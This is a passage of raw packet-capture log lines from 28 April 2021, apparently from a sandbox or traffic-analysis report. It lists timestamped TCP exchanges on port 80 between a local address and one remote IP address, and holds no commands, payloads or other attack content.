                                                                                                                                          Apr 28, 2021 22:58:43.702117920 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.702184916 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.702202082 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.702219009 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.702229977 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.702234030 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.702254057 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.702272892 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.702275038 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.702290058 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.702316999 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.702341080 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.722343922 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.744585037 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771190882 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771228075 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771246910 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771267891 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771285057 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771301031 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771305084 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771327972 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771337032 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771342993 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771351099 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771367073 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771387100 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771406889 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771414995 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771425009 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771444082 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771461964 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771473885 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771480083 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771497011 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771511078 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771512985 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771531105 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771542072 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771553040 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771570921 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771572113 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771589994 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771601915 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771608114 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771624088 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771640062 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771651983 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771656990 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771675110 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771692991 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771693945 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771708965 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771722078 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771723032 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771739006 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771755934 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771761894 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771774054 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771790981 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771806955 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771811008 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771825075 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771837950 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771841049 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771862030 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771869898 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771879911 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771897078 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771897078 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.771913052 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771929979 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771945953 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771964073 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771987915 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.771996975 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772005081 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772023916 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772037983 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772041082 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772063017 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772070885 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772083044 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772099972 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772114038 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772116899 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772135019 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772135973 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772151947 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772167921 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772180080 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772186041 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772208929 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772224903 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772228003 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772245884 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772259951 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772264957 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772283077 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772293091 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772300005 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772317886 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772326946 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772335052 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772356987 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772361040 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772377014 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772396088 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772396088 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772413969 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772432089 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772439957 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772449017 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772466898 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772484064 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772484064 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772505045 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772512913 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772524118 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772546053 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772555113 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772562027 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772567034 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772567987 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772581100 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772598982 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772614956 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772620916 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772640944 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772659063 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772675991 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772676945 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772696972 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772712946 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772715092 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772732019 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772746086 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772749901 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772770882 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772779942 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772790909 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772809029 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772809029 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772829056 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772845030 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772854090 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772861958 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772877932 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772892952 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772895098 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772914886 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772933960 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772937059 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772950888 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.772952080 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772969961 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772985935 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.772995949 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773003101 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773025036 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773030996 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773036957 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773046017 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773061991 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773066998 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773082972 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773099899 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773116112 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773117065 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773133039 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773149967 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773161888 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773164988 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773180962 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773195982 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773196936 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773216009 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773230076 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773233891 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773250103 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773261070 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773266077 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773283958 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773291111 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773299932 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773317099 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773319960 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773334980 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773353100 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773355961 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773375034 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773402929 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773402929 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773418903 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773430109 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773435116 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773452997 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773463011 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773473978 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773490906 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773492098 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773507118 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773525000 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773534060 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773542881 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773559093 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773576021 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773586035 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773591995 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773612976 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773618937 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773631096 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773648024 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773648024 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773663998 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773682117 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773696899 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773701906 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773714066 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773729086 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773751020 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773755074 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773770094 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773778915 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773786068 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773802996 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773813009 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773819923 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773834944 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773847103 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773852110 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773871899 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773880005 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773891926 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.773910999 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.773947001 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.844335079 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.844364882 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.844536066 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.872874022 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.874876976 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.914191008 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.914226055 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.914247036 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.914263010 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.914374113 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.914427996 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.058118105 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.060017109 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.464139938 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534013987 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534051895 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534074068 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534096003 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534116983 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534137964 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534159899 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534185886 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534209013 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534216881 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534233093 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534255028 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534259081 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534276009 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534298897 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534300089 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534318924 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534327984 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534341097 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534365892 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534378052 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534388065 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534409046 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534419060 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534429073 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534451008 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534471989 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534471989 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534492016 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534501076 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534513950 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534537077 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534547091 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534559965 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534565926 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534579992 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534600019 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534600973 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534624100 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534636021 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534643888 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534666061 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534676075 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534691095 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534723043 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534734011 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534737110 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.534770966 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.534801960 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:44.604536057 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.604567051 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.604581118 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.604593039 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.604609966 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.604626894 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.604646921 CEST804973578.47.81.226192.168.2.4
